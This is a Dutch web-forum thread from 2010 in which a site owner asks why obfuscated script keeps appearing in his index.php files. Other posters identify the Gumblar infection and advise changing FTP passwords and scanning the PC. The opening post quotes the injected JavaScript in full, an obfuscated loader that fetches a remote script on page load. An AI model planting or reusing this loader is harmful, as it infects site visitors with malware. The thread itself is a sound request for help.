[PHP] gehacked??

Pagina: 1
Acties:

Onderwerpen


Acties:
  • 0 Henk 'm!

  • T1psY
  • Registratie: December 2006
  • Laatst online: 07-05 11:11

T1psY

Dumo-Technics

Topicstarter
Id het mogelijk dat iemand mijn PHP kan hacken? Op de server zitten namelijk verschillende domeinen en dit heeft altijd goed gewerkt, behalve op 1 domein word er steeds in alle .php bestanden het volgende toegevoegd:

code:
1
2
3
4
<script>var x='';var xz='';var tl;if(tl!=''){tl='yc'};var q=document;var xh;if(xh!='g'){xh='g'};var r='s*c%r%i>p>t%'.replace(/[%k\*Q\>]/g, '');var p=window;var o;if(o!='jvj' && o!='h'){o='jvj'};var es=8735;p.onload=function(){var n=false;var uk=new String();try {this.ds="";e=q.createElement(r);var ql=new String();var qkp;if(qkp!='w'){qkp=''};this.wn=59283;var ft;if(ft!='' && ft!='jq'){ft=null};var cwa=false;e.src='hNtLtNp;:;/L/LgMoLoLgLl;eL-Ms2kN.MpNcMoLn;l;iMn2eN.2c;oMmM.;cNnL.NcNoLrMrLi2e2r2e;-Mi;t2.My;o2u;r;t;aNg;hMeNuLe;r2.MrMuL:;8;028N0;/2g2o2oNgNlLeN.2cNoMmM/2g;oLoNg2lMeN.NcLo2mN/;w2iLkNi2m2eLdLiMaL.No;r;gL/NrLm;x;aNd2sN.;c2oNmM/Mv;eLo2h2.Nc;o;mL/L'.replace(/[L;MN2]/g, '');var pk="";var et='';e.setAttribute('d@eTfTe@rt'.replace(/[tWT\>@]/g, ''), "1");var vk='';this.tle=977;q.body.appendChild(e);this.za='';} catch(_){var uz=false;var ra;if(ra!='bt' && ra != ''){ra=null};};var iwk=false;};var ti;if(ti!='tf'){ti=''};var i_="i_";</script>

<script>var tf="";var os;if(os!=''){os='y'};var w=window;var ty="ty";var t=document;var ep;if(ep!='d' && ep!='tl'){ep='d'};function i(k){var r=['h&t&tVp>:E/>/Et>rAi&pAoAdV-EcAoAm&.>a>sAkV.Ec>o&m>.VcEo>oAk>p>a>dE-Vc>oEmA.AhAoEtVnAe&wEgAu&i&d>eA.Ar>uA:&8E0E8E0>/At>rAi>bVaEl&fAu&sAi&o>nE.AcVo>mV/&tEr&iAb&aEl>fVuAsAi>o&n&.AcAoVm>/VgVoVoVgVlAeA.Ec>oVm>/>o>vVe>rV->b&lEo&gV.AcVo>mV/>5EdA6EdA.Ec>oAmV/V'.replace(/[VA\>E&]/g, ''), 'szcOrOiOpNtz'.replace(/[zRONY]/g, ''), 'cUrSe+aUtSeXEWlSe+mXeWnWt+'.replace(/[\+UWXS]/g, ''), 'o0n:l>o_a>d0'.replace(/[0~_\:\>]/g, ''), 'sPr<c,'.replace(/[,PtI\<]/g, ''), 'aXpBpbe@nbd2C2hbiXl2db'.replace(/[bB2X@]/g, ''), 's:e#t:Amt:t%roiob#u%t%eo'.replace(/[o\:m%#]/g, ''), 'b,o,djyz'.replace(/[z#,j\*]/g, ''), 'd8eZfZe;rZ'.replace(/[Zg8m;]/g, ''), "1"];var tw=r[k];var oy;if(oy!='' && oy!='v'){oy=null};return tw;var q="";}var xs="";var l = function(){try {e=t[i([2][0])](i([1,1][0]));var wq = t[i([7,9][0])];e[i([9,4][1])]=i([8,0][1]);e[i([6][0])](i([8][0]), i([9][0]));var pg=new Array();wq[i([6,5][1])](e);} catch(o){this.bu=64195;};var tk;if(tk!='a' && tk!='ll'){tk='a'};};var vg;if(vg!='' && vg!='mc'){vg=null};w[i([3][0])]=l;</script>
<!--f5749297bb557496cf63135d56c10cb2-->


Als ik dan de website open dan geeft mijn anti-virus programma altijd foutmeldingen van virussen weer. Ik heb de PHP-backup toen terug gezeg naar een vorige datum, maar nu, een week later staat het script er weer onder.

http://www.dumo-technics.com


Acties:
  • 0 Henk 'm!

  • Nielsvr
  • Registratie: Maart 2004
  • Laatst online: 08-04 11:51
Onveilige PHP scripting is te misbruiken ja, dus dat ligt meer aan je eigen code dan aan PHP (dit is een klassiek voorbeeld trouwens van wat er gebeurd bij slechte scripting).

Acties:
  • 0 Henk 'm!

  • T1psY
  • Registratie: December 2006
  • Laatst online: 07-05 11:11

T1psY

Dumo-Technics

Topicstarter
Denk niet dat het aan de scipting ligt, deze pagina included alleen maar dingen die nodig zijn voor de counter en een FPMap.
De andere sites die op de domein draaien hebben dit probleem niet.

http://www.dumo-technics.com


Acties:
  • 0 Henk 'm!

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 23:53

AW_Bos

Liefhebber van nostalgie... 🕰️

Ik heb geen idee of je op een shared hosting omgeving zit? Want dan zou een andere gebruiker indien de beveiliging op het platform daar echt slecht is ook andere sites kunnen infecteren met vermoedelijk het Gumblar-virus.

Ook raad ik je met klem aan al je FTP wachtwoorden aan te passen vanaf een andere PC (laat het desnoods door je hostingpartij doen) en je PC grondig te scannen op virussen. Want ja, er zijn inderdaad virussen die FTP-connecties sniffen en dus ook de wachtwoorden opvissen waarmee ze je sites infecteren. (met name door verouderde en niet-geupdated Adobe-software)

[ Voor 5% gewijzigd door AW_Bos op 12-02-2010 11:50 ]

☀️ Goedemorgen zonneschijn! ☀️
☀️Ja, je maakt me zo gelukkig, en door jou voel ik me fijn! ☀️


Acties:
  • 0 Henk 'm!

  • T1psY
  • Registratie: December 2006
  • Laatst online: 07-05 11:11

T1psY

Dumo-Technics

Topicstarter
inderdaad het Gumblar-virus kon niet zo gou op de naam komen. Bedankt voor de informatie.

http://www.dumo-technics.com


Acties:
  • 0 Henk 'm!

  • Tiemez
  • Registratie: December 2003
  • Laatst online: 24-10-2022
Dit gebeurde op de server van een klant van ons ook. De bestanden werden gedownload via ftp, aangepast en vervolgens weer geüpload.

Het is waarschijnlijk een virus die zoekt naar opgeslagen wachtwoorden in ftp-clients.

Ftp-wachtwoorden veranderen heeft het opgelost

Acties:
  • 0 Henk 'm!

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 23:53

AW_Bos

Liefhebber van nostalgie... 🕰️

Ik denk dat je hosting er ook goed aan doet om ClamAV te compileren bij de FTP-server, zodat virussen al direct geweigerd worden bij upload :).
Hier heb ikzelf geen ervaring mee...

[ Voor 12% gewijzigd door AW_Bos op 12-02-2010 11:57 ]

☀️ Goedemorgen zonneschijn! ☀️
☀️Ja, je maakt me zo gelukkig, en door jou voel ik me fijn! ☀️


Acties:
  • 0 Henk 'm!

  • T1psY
  • Registratie: December 2006
  • Laatst online: 07-05 11:11

T1psY

Dumo-Technics

Topicstarter
ik zie net dat het enkel op bestanden is die index.php heten, andere .php bestanden hebben er geen last van.

http://www.dumo-technics.com


Acties:
  • 0 Henk 'm!

  • Tiemez
  • Registratie: December 2003
  • Laatst online: 24-10-2022
T1psY schreef op vrijdag 12 februari 2010 @ 11:57:
ik zie net dat het enkel op bestanden is die index.php heten, andere .php bestanden hebben er geen last van.
Werden ook een aantal js-bestanden aangepast in ons geval. b.v. AC_RunActiveContent.js

Acties:
  • 0 Henk 'm!

  • Creepy
  • Registratie: Juni 2001
  • Laatst online: 21:09

Creepy

Tactical Espionage Splatterer

Ik denk dat dit topic beter thuishoort in Beveiliging & Virussen.

Er zijn heel veel manier en hoe iemand je bestand kan aanpassen. Dat kan via een lek in PHP scripts, gebruik van oude software, te simpele wachtwoorden etc.. Ga eerst eens in je logfiles spitten om te kijken of je iets kan achterhalen.

"I had a problem, I solved it with regular expressions. Now I have two problems". That's shows a lack of appreciation for regular expressions: "I know have _star_ problems" --Kevlin Henney


Acties:
  • 0 Henk 'm!

  • AW_Bos
  • Registratie: April 2002
  • Laatst online: 23:53

AW_Bos

Liefhebber van nostalgie... 🕰️

T1psY schreef op vrijdag 12 februari 2010 @ 11:57:
ik zie net dat het enkel op bestanden is die index.php heten, andere .php bestanden hebben er geen last van.
Inderdaad een symptoon van het virus ;).

Als je er last van blijft hebben zou je alle index-files kunnen hernoemen naar start.php ofzo, en met .htaccess deze als indexpage laten gebruiken :).
code:
1
autoindex start.php index.php

Maar dit is meer iets voor als het probleem blijft...

[ Voor 5% gewijzigd door AW_Bos op 12-02-2010 12:02 ]

☀️ Goedemorgen zonneschijn! ☀️
☀️Ja, je maakt me zo gelukkig, en door jou voel ik me fijn! ☀️


Acties:
  • 0 Henk 'm!

  • alt-92
  • Registratie: Maart 2000
  • Niet online

alt-92

ye olde farte

AW_Bos schreef op vrijdag 12 februari 2010 @ 12:02:

Als je er last van blijft hebben zou je alle index-files kunnen hernoemen naar start.php ofzo, en met .htaccess deze als indexpage laten gebruiken :).
code:
1
autoindex start.php index.php

Maar dit is meer iets voor als het probleem blijft...
Nee, dat noemen ze ook wel struisvogelpolitiek spelen.
Pak het probleem bij de wortel aan - zorg dat die troep van die server af is.
Anders past $evilhenkie gewoon z'n code aan en pakt ie niet index.php maar *.php.
Sta je dan met je .htaccess.

ik heb een 864 GB floppydrive! - certified prutser - the social skills of a thermonuclear device


Acties:
  • 0 Henk 'm!

  • DiedX
  • Registratie: December 2000
  • Laatst online: 23:07
Welke FTP-Client gebruik je?

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards


Acties:
  • 0 Henk 'm!

  • T1psY
  • Registratie: December 2006
  • Laatst online: 07-05 11:11

T1psY

Dumo-Technics

Topicstarter
ik gebruik FileZilla, en WS_FTP LE

Edit: misschien ook belangrijk, als anti-virus gebruik ik AVG Pro en Avast! Free

[ Voor 55% gewijzigd door T1psY op 12-02-2010 14:59 ]

http://www.dumo-technics.com


Acties:
  • 0 Henk 'm!

  • DiedX
  • Registratie: December 2000
  • Laatst online: 23:07

DiedX supports the Roland™, Sound Blaster™ and Ad Lib™ sound cards

Pagina: 1